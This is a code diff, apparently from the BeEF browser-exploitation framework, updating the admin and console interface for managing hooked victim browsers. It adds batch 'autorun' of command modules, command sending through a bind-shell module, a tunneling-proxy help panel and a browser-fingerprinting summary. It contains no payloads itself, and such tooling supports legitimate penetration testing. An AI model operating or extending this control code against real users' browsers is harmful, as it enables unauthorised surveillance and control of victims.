 				hooked_browsers_tree.addZombie(offline_hooked_browser, false, ((tree_type != 'basic') ? true : false));
 			}
-			
+
 			//add an online browser to the tree
 			for(var i in online_hooked_browsers) {
 				var online_hooked_browser = this.zombieFactory(i, online_hooked_browsers);
 				hooked_browsers_tree.addZombie(online_hooked_browser, true, ((tree_type != 'basic') ? true : false));
 			}
-			
+
 			//apply the rules to the tree
 			hooked_browsers_tree.applyRules(rules);
-			
+
 			//expand the online hooked browser tree lists
 			if(hooked_browsers_tree.online_hooked_browsers_treenode.childNodes.length > 0) {
 				hooked_browsers_tree.online_hooked_browsers_treenode.expand(true);
 			}
-			
+
 			//expand the offline hooked browser tree lists
 			if(hooked_browsers_tree.offline_hooked_browsers_treenode.childNodes.length > 0) {
 				hooked_browsers_tree.offline_hooked_browsers_treenode.expand(true);

extensions/admin_ui/media/javascript/ui/panel/common.js

@@ -249,12 +249,24 @@ function genExistingExploitPanel(panel, command_id, zombie, sb) {
 							html = String.format("<div style='color:#385F95;text-align:right;'>{0}</div>", value);
 							html += '<p>';
 							for(index in record.data.data) {
-								result = record.data.data[index];
+								result = $jEncoder.encoder.encodeForHTML(record.data.data[index]).replace(/&lt;br&gt;/g,'<br>');
 								index = index.toString().replace('_', ' ');
-                                //output escape everything, but allow the <br> tag for better rendering.
-								html += String.format('<b>{0}</b>: {1}<br>', index, $jEncoder.encoder.encodeForHTML(result).replace(/&lt;br&gt;/g,'<br>'));
+								// Check if the data is the image parameter and that it's a base64 encoded png.
+								if (result.substring(0,28) == "image=data:image/png;base64,") {
+									// Lets display the image
+									try {
+										base64_data = window.atob(result.substring(29,result.length));
+										html += String.format('<img src="{0}" /><br>', result.substring(6));
+									} catch(e) {
+										beef.debug("Received invalid base64 encoded image string: "+e.toString());
+										html += String.format('<b>{0}</b>: {1}<br>', index, result);
+									}
+								} else {
+									// output escape everything, but allow the <br> tag for better rendering.
+									html += String.format('<b>{0}</b>: {1}<br>', index, result);
+								}
 							}
-							
+
 							html += '</p>';
 							return html;
 						}

extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabAutorun.js

@@ -0,0 +1,336 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+/*
+ * The command tab panel. Listing the list of commands sent to the zombie.
+ * Loaded in /ui/panel/index.html
+ */
+function generate_form_input_field(form, input, value, disabled, zombie) {
+    var input_field = null;
+    var input_def = null;
+    if (!input['ui_label'])
+        input['ui_label'] = input['name'];
+
+    if (!input['type'])
+        input['type'] = 'textfield';
+
+    if (!input['value'])
+        input['value'] = '';
+
+    input_def = {
+        id: 'form-zombie-'+zombie.session+'-field-'+input['name'],
+        name: 'txt_'+input['name'],
+        fieldLabel: input['ui_label'],
+        anchor:'70%',
+        allowBlank: false,
+        value: input['value']
+    };
+
+        // create the input field object based upon the type supplied
+    switch(input['type'].toLowerCase()) {
+        case 'textfield':
+            input_field = new Ext.form.TextField(input_def);
+            break;
+        case 'textarea':
+            input_field = new Ext.form.TextArea(input_def);
+            break;
+        case 'hidden':
+            input_field = new Ext.form.Hidden(input_def);
+            break;
+        case 'label':
+            input_def['fieldLabel'] = '';
+            input_def['html'] = input['html'];
+            input_field = new Ext.form.Label(input_def);
+            break;
+        case 'checkbox':
+            input_def['name'] = 'chk_' + input['name'];
+            input_field = new Ext.form.Checkbox(input_def);
+            break;
+        case 'checkboxgroup':
+            input_def['name'] = 'chkg_' + input['name'];
+            input_def['items'] = input['items'];
+            input_field = new Ext.form.CheckboxGroup(input_def);
+            break;
+        case 'combobox':
+            input_def['name'] = 'com_' + input['name'];
+            input_def['triggerAction'] = 'all';
+
+            if(input.reloadOnChange || input.defaultPayload != null) {
+                // defined in msfcommand.rb
+                // initially the panel will be empty so it may appear still hidden
+                Ext.getCmp("payload-panel").show();
+                input_def['listeners'] = {
+                    // update the payload options when one of them is selected
+                    'select': function(combo, value) {
+                        get_dynamic_payload_details(combo.getValue(), zombie);
+                    },
+                    // set the default payload value as defined in defaultPayload
+                    'afterrender': function(combo){
+                        combo.setValue(input.defaultPayload);
+                        get_dynamic_payload_details(combo.getValue(),zombie);
+                    }
+                };
+            }
+
+            // create store to contain options for the combo box
+            input_def['store']  = new Ext.data.ArrayStore( {
+                fields: input['store_fields'],
+                data: input['store_data']
+            });
+
+            input_field = new Ext.form.ComboBox(input_def);
+            break;
+
+       default:
+            input_field = new Ext.form.TextField(input_def);
+            break;
+        }
+
+    // add the properties for the input element, for example: widths, default values and the html lables
+    for(definition in input) {
+        if( (typeof input[definition] == 'string') && (definition != 'type') && (definition != 'name')) {
+            input_field[definition] = input[definition];
+        }
+    }
+
+    if(value)
+         input_field.setValue(value);
+    if(disabled)
+        input_field.setDisabled(true);
+
+    form.add(input_field);
+}
+
+function get_module_details(id,token){
+    var mod = null;
+    var url = "/api/modules/"+id+"?token="+token;
+    $jwterm.ajax({
+        contentType: 'application/json',
+        dataType: 'json',
+        type: 'GET',
+        url: url,
+        async:false,
+        processData: false,
+        success: function(data){
+            mod = data;
+        }
+    });
+    //add module id which is not returned by the RESTful API
+    mod['id'] = id;
+    return mod;
+}
+
+function process_module_opts(mod){
+    var mod_json = {
+       'mod_id': mod['id'],
+       'mod_input':[]
+    };
+   var opts = mod['options'];
+   var label='ui_label';
+   var type = 'type';
+   var type_val;
+   var label_val;
+   var value;
+   var type;
+   var key = value = label = type_val = "";
+   var input;
+
+   if(opts.length > 0){
+       for( var i=0;i<opts.length;i++){
+           input = {};
+           key = opts[i]['name'];
+           value = opts[i]['value'];
+           type_val = opts[i]['type'];
+           label_val = opts[i][label];
+           input[key]=value;
+           input[label]=label_val;
+           input[type] = type_val;
+           mod_json['mod_input'].push(input);
+       }
+   }
+   return mod_json;
+}
+
+function send_modules(token,module_data){
+    var url = "/api/modules/multi_module"+"?token="+token;
+    var payload = Ext.encode(module_data);
+    $jwterm.ajax({
+        contentType: 'application/json',
+        data: payload,
+        dataType: 'json',
+        type: 'POST',
+        url: url,
+        async:false,
+        processData: false,
+        success: function(data){
+            var results = data;
+        }
+    });
+}
+
+    /* Creates the same tree as the command module list*/
+ZombieTab_Autorun = function(zombie) {
+
+    var token = beefwui.get_rest_token();
+
+    var details_panel = new Ext.FormPanel({
+        id: "zombie-autorun_details"+zombie.session,
+        title: "Module Details",
+        region:'west',
+        border: true,
+        width: 250,
+        minSize: 250,
+        maxSize: 500
+    });
+
+    var list_panel = new Ext.Panel({
+        id: "zombie-autorun-list"+zombie.session,
+        title: "Selected Modules",
+        region:'west',
+        border: true,
+        width: 190,
+        minSize: 190,
+        maxSize: 500
+    });
+
+    var command_module_tree = new Ext.tree.TreePanel({
+        id: "zombie-autorun-modules"+zombie.session,
+        title: "Module Tree",
+        border: true,
+        region: 'west',
+        width: 190,
+        minSize: 190,
+        maxSize: 500, // if some command module names are even longer, adjust this value
+        useArrows: true,
+        autoScroll: true,
+        animate: true,
+        containerScroll: true,
+        rootVisible: false,
+        root: {nodeType: 'async'},
+        buttons:[new Ext.Button({
+            text:'Execute',
+            hidden:false,
+            handler:function(){
+                var tree = Ext.getCmp('zombie-autorun-modules'+zombie.session);
+                var sel_nodes = tree.getChecked();
+                if(sel_nodes.length > 0){
+                    sel_nodes.forEach(function(item){
+                        if(item.hasChildNodes())
+                            sel_nodes.remove(item)
+                    });
+
+                    var mods_to_send = {
+                        'hb':zombie.session,
+                        'modules':[]
+                    };
+
+                    Ext.each(sel_nodes,function(item){
+                        var id = item.id;
+                        var module = get_module_details(id,token);
+                        module = process_module_opts(module);
+                        mods_to_send['modules'].push(module);
+                    });
+                    send_modules(token,mods_to_send);
+                }else {
+                    //TODO: handle this case
+                }
+         }})],
+         loader: new Ext.tree.TreeLoader({
+                dataUrl: '/ui/modules/select/commandmodules/tree.json',
+                baseParams: {zombie_session: zombie.session},
+                createNode: function(attr) {
+                if(attr.checked == null){attr.checked = false;}
+                        return Ext.tree.TreeLoader.prototype.createNode.call(this, attr);
+            },
+            listeners:{
+                beforeload: function(treeloader, node, callback) {
+                // Show loading mask on body, to prevent the user interacting with the UI
+                    treeloader.treeLoadingMask = new Ext.LoadMask(Ext.getBody(),{msg:"Please wait, command tree is loading..."});
+                    treeloader.treeLoadingMask.show();
+                    return true;
+                },
+                load: function(treeloader, node, response) {
+                       // Hide loading mask after tree is fully loaded
+                       treeloader.treeLoadingMask.hide();
+                       //if(node.parentNode.isChecked())
+                         node.getUI().toggleCheck();
+                          return true;
+                 }
+            }
+        }),
+        listeners: {
+            'click': function(node) {
+                if(!node.hasChildNodes()){
+                    details_panel.removeAll();
+                    details_panel.doLayout();
+                    // needs to be a functions (get_module_opts)
+                    var id = node.id;
+                    var module = get_module_details(id,token);
+                    if(!module){
+                        Ext.beef.msg("Module is null");
+                    }
+
+                    var inputs = module['options'];
+                    Ext.each(inputs,function(item){
+                        generate_form_input_field(details_panel,item,item['value'],false,zombie);
+                    });
+
+                    details_panel.doLayout();
+               }
+            },
+            'afterrender' : function() {},
+            'selectionchange' : function() {},
+            'activate' : function() {},
+            'select' : function() {},
+            'keyup' : function() {},
+            'render' : function(c) { c.getEl().on('keyup', function() {});},
+            'checkchange':function(node,check){
+                if(check){
+                    // expand and select all nodes under a parent
+                    if(node.isExpandable())
+                        node.expand();
+                        node.cascade(function(n){
+                        if(!n.getUI().isChecked())
+                            n.getUI().toggleCheck();
+                    });
+                }
+                // Collapse and deselect all children under the parent
+                else{
+                    node.cascade(function(n){
+                    if(n.getUI().isChecked())
+                        n.getUI().toggleCheck();
+                    });
+                    node.collapse();
+                }
+            }
+        }
+    });
+
+    ZombieTab_Autorun.superclass.constructor.call(this, {
+        id: 'zombie-'+zombie.session+'-autorun-panel',
+        title:'Autorun',
+        layout: 'hbox',
+        hidden: true,
+        layoutConfig:{align:'stretch'},
+        region: 'center',
+        selModel:Ext.tree.MultiSelectionModel,
+        items:[command_module_tree,details_panel]
+    });
+};
+
+Ext.extend(ZombieTab_Autorun, Ext.Panel, {
+    listeners: {close: function(panel) {}}
+});
+

extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js

@@ -19,27 +19,6 @@ ZombieTab_IpecTab = function(zombie) {
         autoscroll: true
 	});
 
-    function get_rest_token(){
-        var token = "";
-        var url = "/ui/modules/getRestfulApiToken.json";
-        $jwterm.ajax({
-            contentType: 'application/json',
-            dataType: 'json',
-            type: 'GET',
-            url: url,
-            async: false,
-            processData: false,
-            success: function(data){
-                token = data.token;
-                console.log(token);
-            },
-            error: function(){
-                console.log("Error getting RESTful API token");
-            }
-        });
-        return token;
-    }
-
     function get_module_id(name, token){
         var id = "";
         var url = "/api/modules/search/" + name + "?token=" + token;
@@ -54,7 +33,7 @@ ZombieTab_IpecTab = function(zombie) {
                 id = data.id;
             },
             error: function(){
-                console.log("Error getting module id.");
+                beef.debug("Error getting module id.");
             }
         });
         return id;
@@ -115,7 +94,7 @@ ZombieTab_IpecTab = function(zombie) {
                 var cmd = tokens.join(' '); //needed in case of commands with options
                 cmd = cmd.replace(/\\/g, '\\\\'); //needed to prevent JS errors (\ need to be escaped)
 
-                var token = get_rest_token();
+                var token = beefwui.get_rest_token();
                 var mod_id = get_module_id("BeEF_bind_shell", token);
 
                 var uri = "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token;
@@ -131,11 +110,11 @@ ZombieTab_IpecTab = function(zombie) {
                     async: false,
                     processData: false,
                     success: function(data){
-                        console.log("data: " + data.command_id);
+                        beef.debug("data: " + data.command_id);
                         result = "Command [" + data.command_id + "] sent successfully";
                     },
                     error: function(){
-                        console.log("Error sending command");
+                        beef.debug("Error sending command");
                         return "Error sending command";
                     }
                 });
@@ -148,7 +127,7 @@ ZombieTab_IpecTab = function(zombie) {
 
                 if(command_id != null){
 
-                    var token = get_rest_token();
+                    var token = beefwui.get_rest_token();
                     var mod_id = get_module_id("BeEF_bind_shell", token);
 
                     var uri_results = "/api/modules/" + zombie.session + "/" + mod_id + "/"
@@ -163,13 +142,13 @@ ZombieTab_IpecTab = function(zombie) {
                         processData: false,
                         success: function(data){
                             $jwterm.each(data, function(i){
-                                console.log("result [" + i +"]: " + $jwterm.parseJSON(data[i].data).data);
+                                beef.debug("result [" + i +"]: " + $jwterm.parseJSON(data[i].data).data);
                                 results += $jwterm.parseJSON(data[i].data).data;
                             });
 
                         },
                         error: function(){
-                            console.log("Error sending command");
+                            beef.debug("Error sending command");
                             return "Error sending command";
                         }
                     });

extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabRider.js

@@ -32,7 +32,7 @@ ZombieTab_Requester = function(zombie) {
 		title: 'Proxy',
 		layout: 'fit',
 		padding: '10 10 10 10',
-                html: "<p style='font:11px tahoma,arial,helvetica,sans-serif'>The Tunneling Proxy allows you to use a hooked browser as a proxy. Simply right-click a browser from the Hooked Browsers tree to the left and select \"Use as Proxy\". Each request sent through the Proxy is recorded in the History panel in the Rider tab. Click a history item to view the HTTP headers and HTML source of the HTTP response.</p>",
+                html: "<div style='font:11px tahoma,arial,helvetica,sans-serif;width:500px' ><p style='font:11px tahoma,arial,helvetica,sans-serif'>The Tunneling Proxy allows you to use a hooked browser as a proxy. Simply right-click a browser from the Hooked Browsers tree to the left and select \"Use as Proxy\".</p><p style='margin: 10 0 10 0'><img src='/ui/media/images/help/proxy.png'></p><p>The proxy runs on localhost port 6789 by default. Each request sent through the Proxy is recorded in the History panel in the Rider tab. Click a history item to view the HTTP headers and HTML source of the HTTP response.</p><p style='margin: 10 0 10 0'><img src='/ui/media/images/help/history.png'></p><p style='font:11px tahoma,arial,helvetica,sans-serif'>To manually forge an arbitrary HTTP request use the \"Forge Request\" tab from the Rider tab.</p><p style='margin: 10 0 10 0'><img src='/ui/media/images/help/forge.png'></p><p style='font:11px tahoma,arial,helvetica,sans-serif'>For more information see: <a href=\"https://github.com/beefproject/beef/wiki/Tunneling\">https://github.com/beefproject/beef/wiki/Tunneling</a></p></div>",
 		listeners: {
 			activate: function(proxy_panel) {
 				// to do: refresh list of hooked browsers

extensions/console/lib/command_dispatcher/command.rb

@@ -10,9 +10,18 @@ module CommandDispatcher
   
 class Command
   include BeEF::Extension::Console::CommandDispatcher
+
+  @@params = []
   
   def initialize(driver)
     super
+    begin 
+      driver.interface.cmd['Data'].each{|data|
+        @@params << data['name']
+      }
+    rescue
+      return
+    end
   end
   
   def commands
@@ -41,12 +50,16 @@ class Command
     }
       
     print_line("Module name: " + driver.interface.cmd['Name'])
-    print_line("Module category: " + driver.interface.cmd['Category'])
+    print_line("Module category: " + driver.interface.cmd['Category'].to_s)
     print_line("Module description: " + driver.interface.cmd['Description'])
     print_line("Module parameters:") if not driver.interface.cmd['Data'].length == 0
 
     driver.interface.cmd['Data'].each{|data|
-      print_line(data['name'] + " => \"" + data['value'].to_s + "\" # " + data['ui_label'])
+      if data['type'].eql?("combobox")
+        print_line(data['name'] + " => \"" + data['value'].to_s + "\" # " + data['ui_label'] + " (Options include: " + data['store_data'].to_s + ")")
+      else
+        print_line(data['name'] + " => \"" + data['value'].to_s + "\" # " + data['ui_label'])
+      end
     } if not driver.interface.cmd['Data'].nil?
   end
   
@@ -80,6 +93,16 @@ class Command
     print_status("Sets parameters for the current modules. Run \"cmdinfo\" to see the parameter values")
     print_status("  Usage: param <paramname> <paramvalue>")
   end
+
+  def cmd_param_tabs(str,words)
+    return if words.length > 1
+
+    if @@params == ""
+      #nothing prepopulated?
+    else
+      return @@params
+    end
+  end
   
   def cmd_execute(*args)
     @@bare_opts.parse(args) {|opt, idx, val|
@@ -119,6 +142,7 @@ class Command
         ])
 
     if args[0] == nil
+      lastcmdid = nil
       driver.interface.getcommandresponses.each do |resp|
         indiresp = driver.interface.getindividualresponse(resp['object_id'])
         respout = ""
@@ -126,6 +150,7 @@ class Command
           respout = "No response yet"
         else
           respout = Time.at(indiresp[0]['date'].to_i).to_s
+          lastcmdid = resp['object_id']
         end
         tbl << [resp['object_id'].to_s, resp['creationdate'], respout]
       end
@@ -133,6 +158,16 @@ class Command
       puts "\n"
       puts "List of responses for this command module:\n"
       puts tbl.to_s + "\n"
+
+      if not lastcmdid.nil?
+        resp = driver.interface.getindividualresponse(lastcmdid)
+        puts "\n"
+        print_line("The last response [" + lastcmdid.to_s + "] was retrieved: " + Time.at(resp[0]['date'].to_i).to_s)
+        print_line("Response:")
+        resp.each do |op|
+          print_line(op['data']['data'].to_s)
+        end
+      end
     else
       output = driver.interface.getindividualresponse(args[0])
       if output.nil?

extensions/console/lib/command_dispatcher/core.rb

@@ -141,12 +141,14 @@ class Core
         [
           'Id',
           'IP',
+          'Hook Host',
           'Browser',
-          'OS'
+          'OS',
+          'Hardware'
         ])
     
     BeEF::Core::Models::HookedBrowser.all(:lastseen.gte => (Time.new.to_i - 30)).each do |zombie|
-      tbl << [zombie.id,zombie.ip,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserName')+"-"+BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserVersion'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'OsName')]
+      tbl << [zombie.id,zombie.ip,BeEF::Core::Models::BrowserDetails.get(zombie.session,"HostName").to_s,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserName').to_s+"-"+BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserVersion').to_s,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'OsName'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'Hardware')]
     end
     
     puts "\n"
@@ -173,12 +175,14 @@ class Core
         [
           'Id',
           'IP',
+          'Hook Host',
           'Browser',
-          'OS'
+          'OS',
+          'Hardware'
         ])
     
     BeEF::Core::Models::HookedBrowser.all(:lastseen.lt => (Time.new.to_i - 30)).each do |zombie|
-      tbl << [zombie.id,zombie.ip,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserName')+"-"+BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserVersion'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'OsName')]
+      tbl << [zombie.id,zombie.ip,BeEF::Core::Models::BrowserDetails.get(zombie.session,"HostName").to_s,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserName').to_s+"-"+BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserVersion').to_s,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'OsName'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'Hardware')]
     end
     
     puts "\n"
@@ -282,12 +286,21 @@ class Core
       offlinezombies << zombie.id
     end
     
-    if not offlinezombies.include?(args[0].to_i)
-      print_status("Browser does not appear to be offline..")
-      return false
-    end
+    targets = args[0].split(',')
+    targets.each {|t|
+        if not offlinezombies.include?(t.to_i)
+          print_status("Browser [id:"+t.to_s+"] does not appear to be offline.")
+          return false
+        end
+    #print_status("Adding browser [id:"+t.to_s+"] to target list.")
+    }
+
+    # if not offlinezombies.include?(args[0].to_i)
+    #   print_status("Browser does not appear to be offline..")
+    #   return false
+    # end
     
-    if not driver.interface.setofflinetarget(args[0]).nil?
+    if not driver.interface.setofflinetarget(targets).nil?
       if (driver.dispatcher_stack.size > 1 and
 	      driver.current_dispatcher.name != 'Core')
 	      driver.destack_dispatcher
@@ -298,7 +311,7 @@ class Core
       if driver.interface.targetid.length > 1
         driver.update_prompt("(%bld%redMultiple%clr) ["+driver.interface.targetid.join(",")+"] ")
       else
-        driver.update_prompt("(%bld%red"+driver.interface.targetip+"%clr) ["+driver.interface.targetid.to_s+"] ")
+        driver.update_prompt("(%bld%red"+driver.interface.targetip+"%clr) ["+driver.interface.targetid.first.to_s+"] ")
       end
     end  
     
@@ -326,7 +339,12 @@ class Core
         driver.run_single("offline")
       when 'commands'
         if driver.dispatched_enstacked(Target)
+          if args[1] == "-s" and not args[2].nil?
+           driver.run_single("commands #{args[1]} #{args[2]}")
+           return
+         else
           driver.run_single("commands")
+        end
         else
           print_error("You aren't targeting a zombie yet")
         end

extensions/console/lib/command_dispatcher/target.rb

@@ -18,7 +18,7 @@ class Target
     begin
       driver.interface.getcommands.each { |folder|
         folder['children'].each { |command|
-          @@commands << folder['text'] + command['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_")
+          @@commands << folder['text'].gsub(/\s/,"_") + command['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_")
         }
       }
     rescue
@@ -40,17 +40,29 @@ class Target
   
   @@bare_opts = Rex::Parser::Arguments.new(
 	  "-h" => [ false, "Help."              ])
+
+  @@commands_opts = Rex::Parser::Arguments.new(
+    "-h" => [ false, "Help."],
+    "-s" => [ false, "<search term>"],
+    "-r" => [ false, "List modules which have responses against them only"])
   
   def cmd_commands(*args)
+
+    searchstring = nil
+    responly = nil
     
-    @@bare_opts.parse(args) {|opt, idx, val|
+    @@commands_opts.parse(args) {|opt, idx, val|
       case opt
         when "-h"
           cmd_commands_help
           return false
+        when "-s"
+          searchstring = args[1].downcase if not args[1].nil?
+        when "-r"
+          responly = true
         end
     }
-    
+
     tbl = Rex::Ui::Text::Table.new(
       'Columns' =>
         [
@@ -63,10 +75,29 @@ class Target
     
     driver.interface.getcommands.each { |folder|
       folder['children'].each { |command|
-        tbl << [command['id'].to_i,
-                folder['text'] + command['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_"),
+
+        cmdstring = folder['text'].gsub(/\s/,"_") + command['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_")
+
+        if not searchstring.nil?
+          if not cmdstring.downcase.index(searchstring).nil?
+            tbl << [command['id'].to_i,
+                cmdstring,
                 command['status'].gsub(/^Verified /,""),
                 driver.interface.getcommandresponses(command['id']).length] #TODO
+          end
+        elsif not responly.nil?
+             tbl << [command['id'].to_i,
+                cmdstring,
+                command['status'].gsub(/^Verified /,""),
+                driver.interface.getcommandresponses(command['id']).length] if driver.interface.getcommandresponses(command['id']).length.to_i > 0
+
+        else 
+         tbl << [command['id'].to_i,
+            cmdstring,
+            command['status'].gsub(/^Verified /,""),
+            driver.interface.getcommandresponses(command['id']).length] #TODO
+        end
+
       }
     }
     
@@ -78,6 +109,9 @@ class Target
   
   def cmd_commands_help(*args)
     print_status("List command modules for this target")
+    print_line("Usage: commands [options]")
+    print_line
+    print @@commands_opts.usage()
   end
   
   def cmd_info(*args)
@@ -133,7 +167,7 @@ class Target
     else
       driver.interface.getcommands.each { |x|
         x['children'].each { |y|
-          if args[0].chomp == x['text']+"/"+y['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_")
+          if args[0].chomp == x['text'].gsub(/\s/,"_")+y['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_")
             modid = y['id']
           end
         }

extensions/console/lib/shellinterface.rb

@@ -8,14 +8,14 @@ module Extension
 module Console
 
 class ShellInterface
-  
+
   BD = BeEF::Core::Models::BrowserDetails
-  
+
   def initialize(config)
     self.config = config
     self.cmd = {}
   end
-  
+
   def settarget(id)
     begin
       self.targetsession = BeEF::Core::Models::HookedBrowser.first(:id => id).session
@@ -25,7 +25,7 @@ class ShellInterface
       return nil
     end
   end
-  
+
   def setofflinetarget(id)
     begin
       self.targetsession = BeEF::Core::Models::HookedBrowser.first(:id => id).session
@@ -35,7 +35,7 @@ class ShellInterface
       return nil
     end
   end
-  
+
   def cleartarget
     self.targetsession = nil
     self.targetip = nil
@@ -43,11 +43,11 @@ class ShellInterface
     self.cmd = {}
   end
 
-  # This is a *modified* replica of select_command_modules_tree from extensions/admin_ui/controllers/modules/modules.rb
+  # @note Get commands. This is a *modified* replica of select_command_modules_tree from extensions/admin_ui/controllers/modules/modules.rb
   def getcommands
-    
+
     return if self.targetid.nil?
-    
+
     tree = []
     BeEF::Modules.get_categories.each { |c|
         if c[-1,1] != "/"
@@ -104,39 +104,39 @@ class ShellInterface
         update_command_module_tree(tree, dyn_mod_category, "Verified Unknown", command_mod_name,dyn_mod.id)
        }
     end
-    
-    # sort the parent array nodes 
+
+    # sort the parent array nodes
     tree.sort! {|a,b| a['text'] <=> b['text']}
-  
+
     # sort the children nodes by status
     tree.each {|x| x['children'] =
       x['children'].sort_by {|a| a['status']}
     }
-    
+
     # append the number of command modules so the branch name results in: "<category name> (num)"
     #tree.each {|command_module_branch|
     #  num_of_command_modules = command_module_branch['children'].length
     #  command_module_branch['text'] = command_module_branch['text'] + " (" + num_of_command_modules.to_s() + ")"
     #}
-    
+
     # return a JSON array of hashes
     tree
   end
-  
+
   def setcommand(id)
     key = BeEF::Module.get_key_by_database_id(id.to_i)
-    
+
     self.cmd['id'] = id
     self.cmd['Name'] = self.config.get("beef.module.#{key}.name")
     self.cmd['Description'] = self.config.get("beef.module.#{key}.description")
     self.cmd['Category'] = self.config.get("beef.module.#{key}.category")
     self.cmd['Data'] = BeEF::Module.get_options(key)
   end
-  
+
   def clearcommand
     self.cmd = {}
   end
-  
+
   def setparam(param,value)
     self.cmd['Data'].each do |data|
       if data['name'] == param
@@ -145,12 +145,12 @@ class ShellInterface
       end
     end
   end
-  
+
   def getcommandresponses(cmdid = self.cmd['id'])
-    
+
     commands = []
     i = 0
-    
+
     BeEF::Core::Models::Command.all(:command_module_id => cmdid, :hooked_browser_id => self.targetid).each do |command|
       commands.push({
         'id' => i,
@@ -160,10 +160,10 @@ class ShellInterface
       })
       i+=1
     end
-    
+
     commands
   end
-  
+
   def getindividualresponse(cmdid)
     results = []
     begin
@@ -175,26 +175,26 @@ class ShellInterface
     end
     results
   end
-  
+
   def executecommand
     definition = {}
     options = {}
     options.store("zombie_session", self.targetsession.to_s)
     options.store("command_module_id", self.cmd['id'])
-    
+
     if not self.cmd['Data'].nil?
       self.cmd['Data'].each do |key|
         options.store("txt_"+key['name'].to_s,key['value'])
       end
     end
-    
-    options.keys.each {|param| 
+
+    options.keys.each {|param|
       definition[param[4..-1]] = options[param]
       oc = BeEF::Core::Models::OptionCache.first_or_create(:name => param[4..-1])
       oc.value = options[param]
 	    oc.save
     }
-    
+
     mod_key = BeEF::Module.get_key_by_database_id(self.cmd['id'])
     # Hack to rework the old option system into the new option system
     def2 = []
@@ -207,7 +207,7 @@ class ShellInterface
     else
       return false
     end
-    
+
     #Old method
     #begin
     #  BeEF::Core::Models::Command.new(  :data => definition.to_json,
@@ -218,10 +218,10 @@ class ShellInterface
     #rescue
     #  return false
     #end
-    
+
     #return true
   end
-  
+
   def update_command_module_tree(tree, cmd_category, cmd_status, cmd_name, cmd_id)
 
       # construct leaf node for the command module tree
@@ -240,7 +240,7 @@ class ShellInterface
         end
       }
   end
-  
+
   def get_command_module_status(mod)
       hook_session_id = self.targetsession
       if hook_session_id == nil
@@ -250,7 +250,7 @@ class ShellInterface
         'browser' => BD.get(hook_session_id, 'BrowserName'),
         'ver' => BD.get(hook_session_id, 'BrowserVersion'),
         'os' => [BD.get(hook_session_id, 'OsName')]})
-      
+
         when BeEF::Core::Constants::CommandModule::VERIFIED_NOT_WORKING
           return "Verified Not Working"
         when BeEF::Core::Constants::CommandModule::VERIFIED_USER_NOTIFY
@@ -263,400 +263,111 @@ class ShellInterface
           return "Verified Unknown"
       end
   end
-  
-  #Yoinked from the UI panel - we really need to centralise all this stuff and encapsulate it away??
+
+  # @note Returns a JSON array containing the summary for a selected zombie.
+  # Yoinked from the UI panel -
+  # we really need to centralise all this stuff and encapsulate it away.
   def select_zombie_summary
-    
+
     return if self.targetsession.nil?
 
     # init the summary grid
     summary_grid_hash = {
-      'success' => 'true', 
+      'success' => 'true',
       'results' => []
     }
 
-    # set and add the return values for the page title
-    page_title = BD.get(self.targetsession, 'PageTitle') 
-    if not page_title.nil?
-      encoded_page_title = CGI.escapeHTML(page_title)
-      encoded_page_title_hash = { 'Page Title' => encoded_page_title }
-      
-      page_name_row = {
-        'category' => 'Hooked Page',
-        'data' => encoded_page_title_hash,
-        'from' => 'Initialization'
-      }
-      
-      summary_grid_hash['results'].push(page_name_row) # add the row
+    # zombie properties
+    # in the form of: category, UI label, value
+    zombie_properties = [
+
+        # Browser
+        ['Browser', 'Browser Name',       'BrowserName'],
+        ['Browser', 'Browser Version',    'BrowserVersion'],
+        ['Browser', 'Browser UA String',  'BrowserReportedName'],
+        ['Browser', 'Browser Platform',   'BrowserPlatform'],
+        ['Browser', 'Browser Plugins',    'BrowserPlugins'],
+        ['Browser', 'Window Size',        'WindowSize'],
+
+        # Browser Components
+        ['Browser Components', 'Flash',              'HasFlash'],
+        ['Browser Components', 'Java',               'JavaEnabled'],
+        ['Browser Components', 'VBScript',           'VBScriptEnabled'],
+        ['Browser Components', 'PhoneGap',           'HasPhonegap'],
+        ['Browser Components', 'Google Gears',       'HasGoogleGears'],
+        ['Browser Components', 'Silverlight',        'HasSilverlight'],
+        ['Browser Components', 'Web Sockets',        'HasWebSocket'],
+        ['Browser Components', 'QuickTime',          'HasQuickTime'],
+        ['Browser Components', 'RealPlayer',         'HasRealPlayer'],
+        ['Browser Components', 'Windows Media Player','HasWMP'], 
+        ['Browser Components', 'VLC',                'HasVLC'],
+        ['Browser Components', 'Foxit',              'HasFoxit'],
+        ['Browser Components', 'WebRTC',             'HasWebRTC'],
+        ['Browser Components', 'ActiveX',            'HasActiveX'],
+        ['Browser Components', 'Session Cookies',    'hasSessionCookies'],
+        ['Browser Components', 'Persistent Cookies', 'hasPersistentCookies'],
+
+        # Hooked Page
